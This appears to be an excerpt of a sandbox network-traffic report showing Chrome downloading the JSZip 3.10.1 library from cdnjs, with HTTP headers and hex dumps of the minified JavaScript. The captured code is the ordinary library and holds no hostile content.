                            Data Ascii: 3975/*!JSZip v3.10.1 - A JavaScript class for generating and reading zip files<http://stuartk.com/jszip>(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/mai
                            2024-12-18 00:01:53 UTC1369INData Raw: 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3b 65 6c 73 65 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 29 2e 4a 53 5a 69 70 3d 65 28 29 7d 7d 28 66 75 6e 63 74 69 6f 6e
                            Data Ascii: t"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function
                            2024-12-18 00:01:53 UTC1369INData Raw: 72 65 70 6c 61 63 65 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 3d 5d 2f 67 2c 22 22 29 29 2e 6c 65 6e 67 74 68 2f 34 3b 69 66 28 65 2e 63 68 61 72 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 3d 3d 3d 70 2e 63 68 61 72 41 74 28 36 34 29 26 26 66 2d 2d 2c 65 2e 63 68 61 72 41 74 28 65 2e 6c 65 6e 67 74 68 2d 32 29 3d 3d 3d 70 2e 63 68 61 72 41 74 28 36 34 29 26 26 66 2d 2d 2c 66 25 31 21 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 62 61 73 65 36 34 20 69 6e 70 75 74 2c 20 62 61 64 20 63 6f 6e 74 65 6e 74 20 6c 65 6e 67 74 68 2e 22 29 3b 66 6f 72 28 6c 3d 63 2e 75 69 6e 74 38 61 72 72 61 79 3f 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 30 7c 66 29 3a 6e 65 77 20 41 72 72 61 79 28 30 7c 66 29 3b 6f 3c 65 2e 6c 65 6e
                            Data Ascii: replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(e.charAt(e.length-1)===p.charAt(64)&&f--,e.charAt(e.length-2)===p.charAt(64)&&f--,f%1!=0)throw new Error("Invalid base64 input, bad content length.");for(l=c.uint8array?new Uint8Array(0|f):new Array(0|f);o<e.len
                            2024-12-18 00:01:53 UTC1369INData Raw: 72 46 72 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 70 69 70 65 28 6e 65 77 20 73 29 2e 70 69 70 65 28 6e 65 77 20 61 28 22 75 6e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 22 29 29 2e 70 69 70 65 28 74 2e 63 6f 6d 70 72 65 73 73 57 6f 72 6b 65 72 28 72 29 29 2e 70 69 70 65 28 6e 65 77 20 61 28 22 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 22 29 29 2e 77 69 74 68 53 74 72 65 61 6d 49 6e 66 6f 28 22 63 6f 6d 70 72 65 73 73 69 6f 6e 22 2c 74 29 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 7b 22 2e 2f 65 78 74 65 72 6e 61 6c 22 3a 36 2c 22 2e 2f 73 74 72 65 61 6d 2f 43 72 63 33 32 50 72 6f 62 65 22 3a 32 35 2c 22 2e 2f 73 74 72 65 61 6d 2f 44 61 74 61 4c 65 6e 67 74 68 50 72 6f 62 65 22 3a 32 36 2c 22 2e 2f 73 74 72 65
                            Data Ascii: rFrom=function(e,t,r){return e.pipe(new s).pipe(new a("uncompressedSize")).pipe(t.compressWorker(r)).pipe(new a("compressedSize")).withStreamInfo("compression",t)},t.exports=o},{"./external":6,"./stream/Crc32Probe":25,"./stream/DataLengthProbe":26,"./stre
                            2024-12-18 00:01:53 UTC1369INData Raw: 6f 6d 69 73 65 3a 6e 7d 7d 2c 7b 6c 69 65 3a 33 37 7d 5d 2c 37 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 31 36 41 72 72 61 79 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 33 32 41 72 72 61 79 2c 69 3d 65 28 22 70 61 6b 6f 22 29 2c 73 3d 65 28 22 2e 2f 75 74 69 6c 73 22 29 2c 61 3d 65 28 22 2e 2f 73 74 72 65 61 6d 2f 47 65 6e 65 72 69 63 57 6f 72 6b 65 72 22 29 2c 6f 3d 6e 3f 22 75 69 6e 74 38 61 72 72 61 79 22 3a 22 61 72 72 61 79 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 61 2e
                            Data Ascii: omise:n}},{lie:37}],7:[function(e,t,r){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,i=e("pako"),s=e("./utils"),a=e("./stream/GenericWorker"),o=n?"uint8array":"array";function h(e,t){a.
                            2024-12-18 00:01:53 UTC1369INData Raw: 61 6e 73 66 6f 72 6d 54 6f 28 22 73 74 72 69 6e 67 22 2c 73 28 64 29 29 2c 6d 3d 49 2e 74 72 61 6e 73 66 6f 72 6d 54 6f 28 22 73 74 72 69 6e 67 22 2c 4f 2e 75 74 66 38 65 6e 63 6f 64 65 28 64 29 29 2c 5f 3d 63 2e 6c 65 6e 67 74 68 21 3d 3d 68 2e 6e 61 6d 65 2e 6c 65 6e 67 74 68 2c 67 3d 6d 2e 6c 65 6e 67 74 68 21 3d 3d 64 2e 6c 65 6e 67 74 68 2c 62 3d 22 22 2c 76 3d 22 22 2c 79 3d 22 22 2c 77 3d 68 2e 64 69 72 2c 6b 3d 68 2e 64 61 74 65 2c 78 3d 7b 63 72 63 33 32 3a 30 2c 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 3a 30 2c 75 6e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 3a 30 7d 3b 74 26 26 21 72 7c 7c 28 78 2e 63 72 63 33 32 3d 65 2e 63 72 63 33 32 2c 78 2e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 3d 65 2e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 2c 78
                            Data Ascii: ansformTo("string",s(d)),m=I.transformTo("string",O.utf8encode(d)),_=c.length!==h.name.length,g=m.length!==d.length,b="",v="",y="",w=h.dir,k=h.date,x={crc32:0,compressedSize:0,uncompressedSize:0};t&&!r||(x.crc32=e.crc32,x.compressedSize=e.compressedSize,x
                            2024-12-18 00:01:53 UTC1369INData Raw: 64 73 3d 5b 5d 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 53 6f 75 72 63 65 4f 66 66 73 65 74 3d 30 2c 74 68 69 73 2e 65 6e 74 72 69 65 73 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 46 69 6c 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 73 6f 75 72 63 65 73 3d 5b 5d 7d 49 2e 69 6e 68 65 72 69 74 73 28 73 2c 69 29 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2e 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6d 65 74 61 2e 70 65 72 63 65 6e 74 7c 7c 30 2c 72 3d 74 68 69 73 2e 65 6e 74 72 69 65 73 43 6f 75 6e 74 2c 6e 3d 74 68 69 73 2e 5f 73 6f 75 72 63 65 73 2e 6c 65 6e 67 74 68 3b 74 68 69 73 2e 61 63 63 75 6d 75 6c 61 74 65 3f 74 68 69 73 2e 63 6f 6e 74 65 6e 74 42 75 66 66 65 72 2e 70 75 73 68 28 65 29 3a 28 74 68 69 73 2e 62 79
                            Data Ascii: ds=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}I.inherits(s,i),s.prototype.push=function(e){var t=e.meta.percent||0,r=this.entriesCount,n=this._sources.length;this.accumulate?this.contentBuffer.push(e):(this.by
                            2024-12-18 00:01:53 UTC1369INData Raw: 72 2c 6e 2c 69 29 7b 76 61 72 20 73 3d 49 2e 74 72 61 6e 73 66 6f 72 6d 54 6f 28 22 73 74 72 69 6e 67 22 2c 69 28 6e 29 29 3b 72 65 74 75 72 6e 20 52 2e 43 45 4e 54 52 41 4c 5f 44 49 52 45 43 54 4f 52 59 5f 45 4e 44 2b 22 5c 30 5c 30 5c 30 5c 30 22 2b 41 28 65 2c 32 29 2b 41 28 65 2c 32 29 2b 41 28 74 2c 34 29 2b 41 28 72 2c 34 29 2b 41 28 73 2e 6c 65 6e 67 74 68 2c 32 29 2b 73 7d 28 74 68 69 73 2e 64 69 72 52 65 63 6f 72 64 73 2e 6c 65 6e 67 74 68 2c 72 2c 65 2c 74 68 69 73 2e 7a 69 70 43 6f 6d 6d 65 6e 74 2c 74 68 69 73 2e 65 6e 63 6f 64 65 46 69 6c 65 4e 61 6d 65 29 3b 74 68 69 73 2e 70 75 73 68 28 7b 64 61 74 61 3a 6e 2c 6d 65 74 61 3a 7b 70 65 72 63 65 6e 74 3a 31 30 30 7d 7d 29 7d 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 65 70 61 72 65 4e 65 78
                            Data Ascii: r,n,i){var s=I.transformTo("string",i(n));return R.CENTRAL_DIRECTORY_END+"\0\0\0\0"+A(e,2)+A(e,2)+A(t,4)+A(r,4)+A(s.length,2)+s}(this.dirRecords.length,r,e,this.zipComment,this.encodeFileName);this.push({data:n,meta:{percent:100}})},s.prototype.prepareNex
                            2024-12-18 00:01:53 UTC1369INData Raw: 2e 67 65 6e 65 72 61 74 65 57 6f 72 6b 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6f 3d 6e 65 77 20 6e 28 61 2e 73 74 72 65 61 6d 46 69 6c 65 73 2c 74 2c 61 2e 70 6c 61 74 66 6f 72 6d 2c 61 2e 65 6e 63 6f 64 65 46 69 6c 65 4e 61 6d 65 29 2c 68 3d 30 3b 74 72 79 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 68 2b 2b 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 65 7c 7c 74 2c 6e 3d 75 5b 72 5d 3b 69 66 28 21 6e 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 72 2b 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 20 21 22 29 3b 72 65 74 75 72 6e 20 6e 7d 28 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73
                            Data Ascii: .generateWorker=function(e,a,t){var o=new n(a.streamFiles,t,a.platform,a.encodeFileName),h=0;try{e.forEach(function(e,t){h++;var r=function(e,t){var r=e||t,n=u[r];if(!n)throw new Error(r+" is not a valid compression method !");return n}(t.options.compress
                            2024-12-18 00:01:53 UTC1369INData Raw: 2e 2f 7a 69 70 45 6e 74 72 69 65 73 22 29 2c 61 3d 65 28 22 2e 2f 73 74 72 65 61 6d 2f 43 72 63 33 32 50 72 6f 62 65 22 29 2c 6c 3d 65 28 22 2e 2f 6e 6f 64 65 6a 73 55 74 69 6c 73 22 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 69 2e 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 6e 2e 64 65 63 6f 6d 70 72 65 73 73 65 64 2e 67 65 74 43 6f 6e 74 65 6e 74 57 6f 72 6b 65 72 28 29 2e 70 69 70 65 28 6e 65 77 20 61 29 3b 72 2e 6f 6e 28 22 65 72 72 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 28 65 29 7d 29 2e 6f 6e 28 22 65 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 73 74 72 65 61 6d 49 6e 66 6f 2e 63 72 63 33 32 21 3d 3d 6e 2e 64 65 63 6f 6d 70 72 65 73 73 65 64 2e 63 72 63
                            Data Ascii: ./zipEntries"),a=e("./stream/Crc32Probe"),l=e("./nodejsUtils");function f(n){return new i.Promise(function(e,t){var r=n.decompressed.getContentWorker().pipe(new a);r.on("error",function(e){t(e)}).on("end",function(){r.streamInfo.crc32!==n.decompressed.crc


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.1649728104.17.24.144437904C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 00:01:55 UTC379OUTGET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1
                            Host: cdnjs.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 00:01:56 UTC955INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 00:01:56 GMT
                            Content-Type: application/javascript; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=30672000
                            ETag: W/"62e9bbf5-6f55"
                            Last-Modified: Wed, 03 Aug 2022 00:06:13 GMT
                            cf-cdnjs-via: cfworker/kv
                            Cross-Origin-Resource-Policy: cross-origin
                            Timing-Allow-Origin: *
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: HIT
                            Age: 1588899
                            Expires: Mon, 08 Dec 2025 00:01:56 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uqYlOTmJrQaQ9XVLma4zEROvtkYp47XyUOdKF3N3Mwmf1Viq1Fkts0GBvIpK%2Bc6tsolLMimsK1D1m5zxDxSvL96SA9IwzJ44GCidQkTDFZS4L1a26IM55m113dr1skgzSdbv8ux"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                            Strict-Transport-Security: max-age=15780000
                            Server: cloudflare
                            CF-RAY: 8f3ae195a9b643cf-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 00:01:56 UTC414INData Raw: 37 62 66 35 0d 0a 2f 2a 21 0a 0a 4a 53 5a 69 70 20 76 33 2e 31 30 2e 31 20 2d 20 41 20 4a 61 76 61 53 63 72 69 70 74 20 63 6c 61 73 73 20 66 6f 72 20 67 65 6e 65 72 61 74 69 6e 67 20 61 6e 64 20 72 65 61 64 69 6e 67 20 7a 69 70 20 66 69 6c 65 73 0a 3c 68 74 74 70 3a 2f 2f 73 74 75 61 72 74 6b 2e 63 6f 6d 2f 6a 73 7a 69 70 3e 0a 0a 28 63 29 20 32 30 30 39 2d 32 30 31 36 20 53 74 75 61 72 74 20 4b 6e 69 67 68 74 6c 65 79 20 3c 73 74 75 61 72 74 20 5b 61 74 5d 20 73 74 75 61 72 74 6b 2e 63 6f 6d 3e 0a 44 75 61 6c 20 6c 69 63 65 6e 63 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 6f 72 20 47 50 4c 76 33 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 53 74 75 6b 2f 6a 73 7a 69 70 2f 6d 61 69
                            Data Ascii: 7bf5/*!JSZip v3.10.1 - A JavaScript class for generating and reading zip files<http://stuartk.com/jszip>(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/mai
                            2024-12-18 00:01:56 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3b 65 6c 73 65 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 29 2e 4a 53 5a 69 70 3d 65 28 29 7d 7d 28 66 75 6e 63 74 69 6f 6e 28 29
                            Data Ascii: ==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function()
                            2024-12-18 00:01:56 UTC1369INData Raw: 70 6c 61 63 65 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 3d 5d 2f 67 2c 22 22 29 29 2e 6c 65 6e 67 74 68 2f 34 3b 69 66 28 65 2e 63 68 61 72 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 3d 3d 3d 70 2e 63 68 61 72 41 74 28 36 34 29 26 26 66 2d 2d 2c 65 2e 63 68 61 72 41 74 28 65 2e 6c 65 6e 67 74 68 2d 32 29 3d 3d 3d 70 2e 63 68 61 72 41 74 28 36 34 29 26 26 66 2d 2d 2c 66 25 31 21 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 62 61 73 65 36 34 20 69 6e 70 75 74 2c 20 62 61 64 20 63 6f 6e 74 65 6e 74 20 6c 65 6e 67 74 68 2e 22 29 3b 66 6f 72 28 6c 3d 63 2e 75 69 6e 74 38 61 72 72 61 79 3f 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 30 7c 66 29 3a 6e 65 77 20 41 72 72 61 79 28 30 7c 66 29 3b 6f 3c 65 2e 6c 65 6e 67 74
                            Data Ascii: place(/[^A-Za-z0-9+/=]/g,"")).length/4;if(e.charAt(e.length-1)===p.charAt(64)&&f--,e.charAt(e.length-2)===p.charAt(64)&&f--,f%1!=0)throw new Error("Invalid base64 input, bad content length.");for(l=c.uint8array?new Uint8Array(0|f):new Array(0|f);o<e.lengt
                            2024-12-18 00:01:56 UTC1369INData Raw: 72 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 70 69 70 65 28 6e 65 77 20 73 29 2e 70 69 70 65 28 6e 65 77 20 61 28 22 75 6e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 22 29 29 2e 70 69 70 65 28 74 2e 63 6f 6d 70 72 65 73 73 57 6f 72 6b 65 72 28 72 29 29 2e 70 69 70 65 28 6e 65 77 20 61 28 22 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 22 29 29 2e 77 69 74 68 53 74 72 65 61 6d 49 6e 66 6f 28 22 63 6f 6d 70 72 65 73 73 69 6f 6e 22 2c 74 29 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 7b 22 2e 2f 65 78 74 65 72 6e 61 6c 22 3a 36 2c 22 2e 2f 73 74 72 65 61 6d 2f 43 72 63 33 32 50 72 6f 62 65 22 3a 32 35 2c 22 2e 2f 73 74 72 65 61 6d 2f 44 61 74 61 4c 65 6e 67 74 68 50 72 6f 62 65 22 3a 32 36 2c 22 2e 2f 73 74 72 65 61 6d
                            Data Ascii: rom=function(e,t,r){return e.pipe(new s).pipe(new a("uncompressedSize")).pipe(t.compressWorker(r)).pipe(new a("compressedSize")).withStreamInfo("compression",t)},t.exports=o},{"./external":6,"./stream/Crc32Probe":25,"./stream/DataLengthProbe":26,"./stream
                            2024-12-18 00:01:56 UTC1369INData Raw: 69 73 65 3a 6e 7d 7d 2c 7b 6c 69 65 3a 33 37 7d 5d 2c 37 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 31 36 41 72 72 61 79 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 33 32 41 72 72 61 79 2c 69 3d 65 28 22 70 61 6b 6f 22 29 2c 73 3d 65 28 22 2e 2f 75 74 69 6c 73 22 29 2c 61 3d 65 28 22 2e 2f 73 74 72 65 61 6d 2f 47 65 6e 65 72 69 63 57 6f 72 6b 65 72 22 29 2c 6f 3d 6e 3f 22 75 69 6e 74 38 61 72 72 61 79 22 3a 22 61 72 72 61 79 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 61 2e 63 61
                            Data Ascii: ise:n}},{lie:37}],7:[function(e,t,r){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,i=e("pako"),s=e("./utils"),a=e("./stream/GenericWorker"),o=n?"uint8array":"array";function h(e,t){a.ca
                            2024-12-18 00:01:56 UTC1369INData Raw: 73 66 6f 72 6d 54 6f 28 22 73 74 72 69 6e 67 22 2c 73 28 64 29 29 2c 6d 3d 49 2e 74 72 61 6e 73 66 6f 72 6d 54 6f 28 22 73 74 72 69 6e 67 22 2c 4f 2e 75 74 66 38 65 6e 63 6f 64 65 28 64 29 29 2c 5f 3d 63 2e 6c 65 6e 67 74 68 21 3d 3d 68 2e 6e 61 6d 65 2e 6c 65 6e 67 74 68 2c 67 3d 6d 2e 6c 65 6e 67 74 68 21 3d 3d 64 2e 6c 65 6e 67 74 68 2c 62 3d 22 22 2c 76 3d 22 22 2c 79 3d 22 22 2c 77 3d 68 2e 64 69 72 2c 6b 3d 68 2e 64 61 74 65 2c 78 3d 7b 63 72 63 33 32 3a 30 2c 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 3a 30 2c 75 6e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 3a 30 7d 3b 74 26 26 21 72 7c 7c 28 78 2e 63 72 63 33 32 3d 65 2e 63 72 63 33 32 2c 78 2e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 3d 65 2e 63 6f 6d 70 72 65 73 73 65 64 53 69 7a 65 2c 78 2e 75
                            Data Ascii: sformTo("string",s(d)),m=I.transformTo("string",O.utf8encode(d)),_=c.length!==h.name.length,g=m.length!==d.length,b="",v="",y="",w=h.dir,k=h.date,x={crc32:0,compressedSize:0,uncompressedSize:0};t&&!r||(x.crc32=e.crc32,x.compressedSize=e.compressedSize,x.u
                            2024-12-18 00:01:56 UTC1369INData Raw: 3d 5b 5d 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 53 6f 75 72 63 65 4f 66 66 73 65 74 3d 30 2c 74 68 69 73 2e 65 6e 74 72 69 65 73 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 46 69 6c 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 73 6f 75 72 63 65 73 3d 5b 5d 7d 49 2e 69 6e 68 65 72 69 74 73 28 73 2c 69 29 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2e 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6d 65 74 61 2e 70 65 72 63 65 6e 74 7c 7c 30 2c 72 3d 74 68 69 73 2e 65 6e 74 72 69 65 73 43 6f 75 6e 74 2c 6e 3d 74 68 69 73 2e 5f 73 6f 75 72 63 65 73 2e 6c 65 6e 67 74 68 3b 74 68 69 73 2e 61 63 63 75 6d 75 6c 61 74 65 3f 74 68 69 73 2e 63 6f 6e 74 65 6e 74 42 75 66 66 65 72 2e 70 75 73 68 28 65 29 3a 28 74 68 69 73 2e 62 79 74 65
                            Data Ascii: =[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}I.inherits(s,i),s.prototype.push=function(e){var t=e.meta.percent||0,r=this.entriesCount,n=this._sources.length;this.accumulate?this.contentBuffer.push(e):(this.byte
                            2024-12-18 00:01:56 UTC1369INData Raw: 6e 2c 69 29 7b 76 61 72 20 73 3d 49 2e 74 72 61 6e 73 66 6f 72 6d 54 6f 28 22 73 74 72 69 6e 67 22 2c 69 28 6e 29 29 3b 72 65 74 75 72 6e 20 52 2e 43 45 4e 54 52 41 4c 5f 44 49 52 45 43 54 4f 52 59 5f 45 4e 44 2b 22 5c 30 5c 30 5c 30 5c 30 22 2b 41 28 65 2c 32 29 2b 41 28 65 2c 32 29 2b 41 28 74 2c 34 29 2b 41 28 72 2c 34 29 2b 41 28 73 2e 6c 65 6e 67 74 68 2c 32 29 2b 73 7d 28 74 68 69 73 2e 64 69 72 52 65 63 6f 72 64 73 2e 6c 65 6e 67 74 68 2c 72 2c 65 2c 74 68 69 73 2e 7a 69 70 43 6f 6d 6d 65 6e 74 2c 74 68 69 73 2e 65 6e 63 6f 64 65 46 69 6c 65 4e 61 6d 65 29 3b 74 68 69 73 2e 70 75 73 68 28 7b 64 61 74 61 3a 6e 2c 6d 65 74 61 3a 7b 70 65 72 63 65 6e 74 3a 31 30 30 7d 7d 29 7d 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 65 70 61 72 65 4e 65 78 74 53
                            Data Ascii: n,i){var s=I.transformTo("string",i(n));return R.CENTRAL_DIRECTORY_END+"\0\0\0\0"+A(e,2)+A(e,2)+A(t,4)+A(r,4)+A(s.length,2)+s}(this.dirRecords.length,r,e,this.zipComment,this.encodeFileName);this.push({data:n,meta:{percent:100}})},s.prototype.prepareNextS
                            2024-12-18 00:01:56 UTC1369INData Raw: 65 6e 65 72 61 74 65 57 6f 72 6b 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6f 3d 6e 65 77 20 6e 28 61 2e 73 74 72 65 61 6d 46 69 6c 65 73 2c 74 2c 61 2e 70 6c 61 74 66 6f 72 6d 2c 61 2e 65 6e 63 6f 64 65 46 69 6c 65 4e 61 6d 65 29 2c 68 3d 30 3b 74 72 79 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 68 2b 2b 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 65 7c 7c 74 2c 6e 3d 75 5b 72 5d 3b 69 66 28 21 6e 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 72 2b 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 63 6f 6d 70 72 65 73 73 69 6f 6e 20 6d 65 74 68 6f 64 20 21 22 29 3b 72 65 74 75 72 6e 20 6e 7d 28 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 69 6f
                            Data Ascii: enerateWorker=function(e,a,t){var o=new n(a.streamFiles,t,a.platform,a.encodeFileName),h=0;try{e.forEach(function(e,t){h++;var r=function(e,t){var r=e||t,n=u[r];if(!n)throw new Error(r+" is not a valid compression method !");return n}(t.options.compressio
